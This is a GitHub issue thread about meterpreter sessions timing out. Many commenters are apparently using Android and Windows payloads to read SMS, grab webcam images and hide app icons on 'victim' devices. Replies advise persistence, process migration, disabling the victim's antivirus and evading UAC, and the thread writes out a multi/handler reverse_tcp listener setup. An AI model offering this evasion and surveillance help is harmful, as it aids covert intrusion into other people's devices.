Closed shanvpz closed 3 years ago
This means that the payload executable has been closed. Maybe by the user or an antivirus. Either way you have to migrate to another process. Also try to use persistence so you can get your session back.
[-] Error running command dump_sms: Rex::TimeoutError Operation timed out. meterpreter > hide_app_icon [-] Error running command hide_app_icon: Rex::TimeoutError Operation timed out. meterpreter > sysinfo [-] Error running command sysinfo: Rex::TimeoutError Operation timed out. meterpreter > webcam_snap [-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
i get this error in all commands can you help me pleaseeeeeeeeeee
Same problem.
meterpreter > sysinfo Computer : localhost OS : Android 9.0 - Linux 4.4.153-perf+ (aarch64) Meterpreter : dalvik/android meterpreter > webcam_snap [-] Error running command webcam_snap: Rex::TimeoutError Operation timed out. meterpreter > [*] 192.168.1. - Meterpreter session 1 closed. Reason: Died so what can i do please help and solve this problem
Refer to my previous comment. The connection/payload has been terminated. There is little else we can do about your error without more info about your situations. Try checking you have the right architecture and related payload config.
I am having the same problem. With every command I am getting the error Rex::TimeoutError Operation timed out, be it sysinfo , migrate or anything. I have disabled all the anti-virus on my target system and Windows Defender and all my payloads and ports seems right to me. If anyone has any solution or suggestion please help.
Is any solution of these error
In my understand and observation, this error occours because of the windows defender system or any other operating system installed on the device. I overcame this error by completely disabling the windows defender system on the target or victim machine. Hope this helps everyone who faces the same problem
Even I've The Same Problem Plz Help😪😪
In my understand and observation, this error occours because of the windows defender system or any other operating system installed on the device. I overcame this error by completely disabling the windows defender system on the target or victim machine. Hope this helps everyone who faces the same problem
If we have access that allow us to disable completely Windows Defender, why should we play with a backdoor in a first place?
Did anyone find a way to at least bypass this issue?
t literally takes 60 seconds to evade UAC and evade native security products & its prolly a good idea to do so before trying anything on their computer anyway, lets say you got a rat or meterpreter session... great... now what are you going to do without admin privileges or being cocklocked by an AV program every chance you get? some of you arent reading the error its very clear.. its timing out, if you have a session and its timing out that means its not a security issue but a latency one, You wouldnt even have a session going to even get as far as to recieve the timeout error if security products were truly in the way if you know what im trying to say, windows is getting good at finding this sort of things. more than likely im willing to bet somebodies connection either yours or the other(s) is not doing so good, lay off heavy things like screenshare/webcam/ and stick with simpler things or get faster internet and your set
one other issue i see that may trigger this time to time is when one accidentally has multiple sessions runing on same client. if you face some redndancy issues where you get 2 meterpreter sessions open on target computer on accident it is advised that you quit the entire msfconsole and restart the entire attack. OR write more eloquent attack vectors or enhanced security measures to ensure that it doesnt physicaly happen again (try using filemelt if your confident or perhaps mutexing)
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
After I successfully get a meterpreter session and I tried to check if victim device is rooted and I got the reply device not rooted which means the command was executed but I had tried all other command such as dump_calllog e.t.c. but I get the error operation failed: 1.
Please I need help on this.
Tengo la solución desactiven el antivirus de la víctima con el comando de meterpreter xD
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
I have tha same issue help
I have tha same issue help
This is likely the battery saver. Try dontkillmyapp.com
gerçekten windows/meterpreter/reverse_http.py=Timing eror false diğeri windows/meterpreter/reverse_tcp=Conncctin no erorr default
This is likely the battery saver. Try dontkillmyapp.com
True. Then perhaps a good feature would be the option to put off the battery optimization from the meterpreter shell.
Steps to reproduce
use multi/handler set payload android/meterpreter/reverse_tcp set lhost localhost set lport 4444 exploit
The above commands listen for the backdoor. and it gets connected when backdoor app opened.
Expected behavior
meterpreter > webcam_stream 2 [] Starting... [] Preparing player... [] Opening player at: YeDzhBwP.html [] Streaming...
will open new browser and play the current video stream
Current behavior
but meterpreter > webcam_stream 2 [] Starting... [] Preparing player... [] Opening player at: YeDzhBwP.html [] Streaming... [-] Error running command webcam_stream: Rex::TimeoutError Operation timed out.
this happens
meterpreter > sysinfo Computer : localhost OS : Android 7.0 - Linux 3.10.84-ga9160e1 (armv7l) Meterpreter : dalvik/android
callog,sysinfo,getuid etc commands are working. but other failed due to timeout
System stuff
msf exploit(multi/handler) > version Framework: 4.16.52-dev-a1027d56c947f83c61f4345a5551e939bb0bfb5c Console : 4.16.52-dev-a1027d56c947f83c61f4345a5551e939bb0bfb5c
using ngrok for connecting.
I installed Metasploit with:
windows installer
OS
What OS are you running Metasploit on? Win 10